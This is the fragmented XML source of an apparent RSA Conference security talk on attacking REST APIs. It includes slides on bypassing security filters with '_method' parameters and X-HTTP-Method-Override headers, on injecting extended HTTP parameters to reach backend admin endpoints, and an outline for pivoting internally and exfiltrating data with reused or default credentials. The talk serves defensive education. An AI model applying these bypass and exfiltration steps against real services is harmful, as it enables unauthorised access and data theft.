    <dgm:cxn modelId="{6D395366-2E80-45EC-BA72-95B4C5A02328}" type="presParOf" srcId="{65269ED6-77B6-414F-837C-2226F4C7B1A6}" destId="{E9737008-A374-4A31-8A1E-7B51B22D0F2C}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{A13DB172-44E9-440E-959E-9979F2E7C370}" type="presParOf" srcId="{E9737008-A374-4A31-8A1E-7B51B22D0F2C}" destId="{495F4BCC-37E2-4C0F-BB32-E2E5A8CECD2A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{73C41CD9-A24D-4E66-8CC1-AD0DF64F73EC}" type="presParOf" srcId="{E9737008-A374-4A31-8A1E-7B51B22D0F2C}" destId="{A6C95658-B3EE-4595-A16D-CAEB9C026BA4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{564A26BB-FC7C-4E07-B164-9BB9FC3473E6}" type="presParOf" srcId="{E9737008-A374-4A31-8A1E-7B51B22D0F2C}" destId="{E5BEEFFD-EAD1-442D-90E7-1876139AB98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E46B-DCC6-47DC-8390-673BE81125DE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3819" y="558385"/>
          <a:ext cx="1629824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</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3819" y="558385"/>
        <a:ext cx="1629824" cy="651929"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1E7E9D61-41C6-4129-B54D-4C2041A92D3C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="248699" y="1242995"/>
          <a:ext cx="2080178" cy="1828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Hacker</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="302243" y="1296539"/>
        <a:ext cx="1973090" cy="1721034"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F3823799-854B-429A-8D09-520241E2711F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2004819" y="681461"/>
          <a:ext cx="786890" cy="40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04819" y="762617"/>
        <a:ext cx="665156" cy="243467"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F20DCE5C-40E2-4A8D-A14F-0D976B032608}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3118343" y="558385"/>
          <a:ext cx="1629824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 Filter/Servlet</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3118343" y="558385"/>
        <a:ext cx="1629824" cy="651929"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F49D1FF0-4D10-47CF-9C48-94106BE0C25E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2847123" y="1242995"/>
          <a:ext cx="2839904" cy="1828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Allows GET requests for public but POST, PUT and DELETE for only admin users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/</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>creditInfo</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2900667" y="1296539"/>
        <a:ext cx="2732816" cy="1721034"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3A279C6C-AA30-48ED-BB75-FBCC4FC8EE28}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="10724">
          <a:off x="5146502" y="686563"/>
          <a:ext cx="844475" cy="40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46502" y="767529"/>
        <a:ext cx="722741" cy="243467"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A6C95658-B3EE-4595-A16D-CAEB9C026BA4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6341510" y="568440"/>
          <a:ext cx="1629824" cy="276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 Service</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6341510" y="568440"/>
        <a:ext cx="1629824" cy="651929"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E5BEEFFD-EAD1-442D-90E7-1876139AB981}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6675330" y="1225568"/>
          <a:ext cx="1629824" cy="1787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Provides credit info</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6723066" y="1273304"/>
        <a:ext cx="1534352" cy="169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E46B-DCC6-47DC-8390-673BE81125DE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="97615" y="0"/>
          <a:ext cx="1543839" cy="92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</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="97615" y="0"/>
        <a:ext cx="1543839" cy="615633"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1E7E9D61-41C6-4129-B54D-4C2041A92D3C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="346730" y="737596"/>
          <a:ext cx="2254065" cy="2759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Hacker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</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1600" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:rPr>
            <a:t>_method</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1600" kern="1200" dirty="0" smtClean="0"/>
            <a:t>” parameter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</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1600" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:rPr>
            <a:t>X-HTTP-Method-Override</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1600" kern="1200" dirty="0" smtClean="0"/>
            <a:t>” header</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="412749" y="803615"/>
        <a:ext cx="2122027" cy="2627532"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F3823799-854B-429A-8D09-520241E2711F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1765348" y="116223"/>
          <a:ext cx="595244" cy="3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765348" y="192860"/>
        <a:ext cx="480288" cy="229913"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F20DCE5C-40E2-4A8D-A14F-0D976B032608}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2764557" y="0"/>
          <a:ext cx="1543839" cy="92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Security Filter/Servlet</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2764557" y="0"/>
        <a:ext cx="1543839" cy="615633"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F49D1FF0-4D10-47CF-9C48-94106BE0C25E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2938465" y="768349"/>
          <a:ext cx="2941128" cy="2760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Looks like a GET </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:rPr>
            <a:t>but turns into PUT, POST, or DELETE</a:t>
          </a:r>
          <a:endParaRPr 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creditInfo</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1600" kern="1200" dirty="0" smtClean="0"/>
            <a:t>?_method=PUT</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3019322" y="849206"/>
        <a:ext cx="2779414" cy="2598942"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3A279C6C-AA30-48ED-BB75-FBCC4FC8EE28}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4439735" y="116223"/>
          <a:ext cx="986183" cy="3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439735" y="192860"/>
        <a:ext cx="871227" cy="229913"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A6C95658-B3EE-4595-A16D-CAEB9C026BA4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6169120" y="0"/>
          <a:ext cx="1543839" cy="92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 Service</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6169120" y="0"/>
        <a:ext cx="1543839" cy="615633"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E5BEEFFD-EAD1-442D-90E7-1876139AB981}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6322750" y="844285"/>
          <a:ext cx="1549965" cy="61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F0000"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Updates</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1600" kern="1200" dirty="0" smtClean="0"/>
            <a:t> credit info</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6340879" y="862414"/>
        <a:ext cx="1513707" cy="58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7A78-D6E4-4548-8207-EEF1AE9CE4A1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DBB3F-1818-4BA3-9186-9D9AA831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6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489912-A394-40DE-9DB1-36C39A9A6FCD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FE253B-2AD3-4D3F-AAA3-558FD77AC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Find an HTTP proxy in the publically exposed Application/REST API or get access to curl on a compromised system in the internal network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Figure out which systems are running on the internal network and target a data rich server.  (Port Scanning and Fingerprinting is easier because the REST protocol is self describing)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>Exfiltrate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> data from the REST interface of the backend system and pass the correct parameters by sniffing the network, reusing credentials, using default </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>userids</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> and passwords, bypassing authentication, reading server logs to find </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>apiKeys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200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253B-2AD3-4D3F-AAA3-558FD77AC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Many REST API frameworks provide extensions that allow clients to pass arbitrary code to server to be executed as a part of the request.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253B-2AD3-4D3F-AAA3-558FD77AC2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SA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513644"/>
            <a:ext cx="3098800" cy="557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435" y="1524001"/>
            <a:ext cx="7339293" cy="1838897"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3200"/>
              </a:lnSpc>
              <a:defRPr sz="26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Session Title Goes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Here.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Arial 26pt</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Initial Caps. Can Go Up to Three Lines</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>in Length.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="share-learn-secu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83" y="220134"/>
            <a:ext cx="1154087" cy="1292577"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="title-slide-hero-a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14" y="3107267"/>
            <a:ext cx="2491586" cy="3773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684" y="3479506"/>
            <a:ext cx="723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SESSION ID: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51994" y="3479798"/>
            <a:ext cx="829204" cy="2397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XXXX-XXXX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4415368"/>
            <a:ext cx="3018367" cy="404989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4842931"/>
            <a:ext cx="3018367" cy="1456267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>
              <a:lnSpc>
                <a:spcPts val="1350"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Presenter’s Title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Company / Organization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@Twitter handle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9868" y="4415368"/>
            <a:ext cx="3075246" cy="404989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Co-Presenter’s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89868" y="4842931"/>
            <a:ext cx="3075246" cy="1456267"/>
          </a:xfr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450"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="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>
              <a:lnSpc>
                <a:spcPts val="1350"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Presenter’s Title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Company / Organization</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="12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/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>@Twitter handle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29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590" y="6356351"/>
            <a:ext cx="1051353" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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bbon-for-transition-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"/>
            <a:ext cx="4671480" cy="6880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911" y="1851238"/>
            <a:ext cx="3707294" cy="3633740"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="2600" b="1" i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Picture 3" descr="RSA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513644"/>
            <a:ext cx="3098800" cy="5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91" y="148784"/>
            <a:ext cx="8229600" cy="1143000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648" y="1535113"/>
            <a:ext cx="4040188" cy="63976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48" y="2271976"/>
            <a:ext cx="4040188" cy="3854187"/>
          </a:xfr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1900"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" indent="-210312">
              <a:lnSpc>
                <a:spcPts val="2100"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:defRPr sz="1800"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="685800" indent="-201168">
              <a:defRPr sz="1700"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="914400" indent="-192024">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:defRPr sz="16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3475" y="1535113"/>
            <a:ext cx="4041775" cy="639763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3475" y="2271976"/>
            <a:ext cx="4041775" cy="3854187"/>
          </a:xfr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1900"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" indent="-210312">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:defRPr sz="1800"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="685800" indent="-201168">
              <a:defRPr sz="1700"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="914400" indent="-192024">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:defRPr sz="16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047778" y="6356351"/>
            <a:ext cx="1051353" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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26" y="4800600"/>
            <a:ext cx="8077167" cy="566739"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr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84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198" y="5367338"/>
            <a:ext cx="7130624" cy="804863"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="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590" y="6356351"/>
            <a:ext cx="1051353" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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ttom-stri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4295"/>
            <a:ext cx="9144000" cy="40640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="master-slide-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65" y="5637428"/>
            <a:ext cx="2193236" cy="12544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656" y="148415"/>
            <a:ext cx="8432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95" y="1365230"/>
            <a:ext cx="83088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55645" y="6198589"/>
            <a:ext cx="457496" cy="1000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50" spc="-100" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>#RSAC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="650" spc="-1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84833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F840BCBA-536C-438F-9EA7-ADACBCC4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01752" indent="-301752" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPts val="2500"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="900"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="tx2"/>
        </a:buClr>
        <a:buSzPct val="60000"/>
        <a:buFont typeface="Wingdings" charset="2"/>
        <a:buChar char="u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594360" indent="-274320" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPts val="2200"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="900"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="tx2"/>
        </a:buClr>
        <a:buSzPct val="60000"/>
        <a:buFont typeface="Wingdings" charset="2"/>
        <a:buChar char="u"/>
        <a:defRPr sz="1800" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Myriad Pro"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="841248" indent="-228600" algn="l" defTabSz="4572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Clr>
          <a:schemeClr val="tx2"/>
        </a:buClr>
        <a:buSzPct val="60000"/>
        <a:buFont typeface="Wingdings" charset="2"/>
        <a:buChar char="u"/>
        <a:defRPr sz="1700" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Arial"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="109728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60000"/>
        <a:buFont typeface="Wingdings" charset="2"/>
        <a:buChar char="u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1298448" indent="-201168" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPts val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="800"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="tx2"/>
        </a:buClr>
        <a:buSzPct val="60000"/>
        <a:buFont typeface="Wingdings" charset="2"/>
        <a:buChar char="u"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:por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ost:port/version" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://host:port/status/cluster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:900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r.com:27080/test/_cm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:password@internalsvr.com/xx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RESTing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> on Your Laurels Will Get You </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Pwnd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ASEC-R01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Abraham Kang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ts val="1350"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Director </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Engineering </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1350"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Samsung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KangAbraham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Alvaro Muñoz Sanchez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Senior Security Researcher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HP Fortify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/>
              <a:t>pwntester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9954" y="5583770"/>
            <a:ext cx="3075246" cy="404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Dinis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Cruz (in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>absentia)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29954" y="6011333"/>
            <a:ext cx="3075246" cy="694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0000"/>
              <a:buFontTx/>
              <a:buNone/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Principal Security Engineer</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security Innovation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DinisCruz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Faking Out Security Filters (Scenario)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29443"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="414338" y="1365250"/>
          <a:ext cx="83089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37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Faking Out Security Filters (Bypass)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7059"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="414338" y="1365250"/>
          <a:ext cx="83089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44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/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Extended HPPP (Apply Your Knowledge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(“entity”);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dirty="0" smtClean="0"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(“id”);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urlGET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>= new URL(“http://svr.com:5984/customers/” + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>entity + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“?id=“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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> id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Change it to a POST to the following URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http://svr.com:5984/admin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231" y="4252963"/>
            <a:ext cx="2182728" cy="1309637"/>
            <a:chOff x="7302" y="1608162"/>
            <a:chExt cx="2182728" cy="1309637"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Rounded Rectangle 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7302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5660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User</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2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17233" y="4637124"/>
            <a:ext cx="462738" cy="541316"/>
            <a:chOff x="2408304" y="1992323"/>
            <a:chExt cx="462738" cy="541316"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Right Arrow 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="240830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6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="240830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72052" y="4252963"/>
            <a:ext cx="2182728" cy="1309637"/>
            <a:chOff x="3063123" y="1608162"/>
            <a:chExt cx="2182728" cy="1309637"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Rounded Rectangle 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="306312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10148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solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>App Server Calls</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="29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3053" y="4637124"/>
            <a:ext cx="462738" cy="541316"/>
            <a:chOff x="5464124" y="1992323"/>
            <a:chExt cx="462738" cy="541316"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Right Arrow 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="546412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>
              <a:off x="546412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27872" y="4252963"/>
            <a:ext cx="2182728" cy="1309637"/>
            <a:chOff x="6118943" y="1608162"/>
            <a:chExt cx="2182728" cy="1309637"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rounded Rectangle 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="611894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615730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Backend REST Service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77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/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Extended HPPP (Apply Your Knowledge </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>I: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(“entity”);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dirty="0" smtClean="0"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
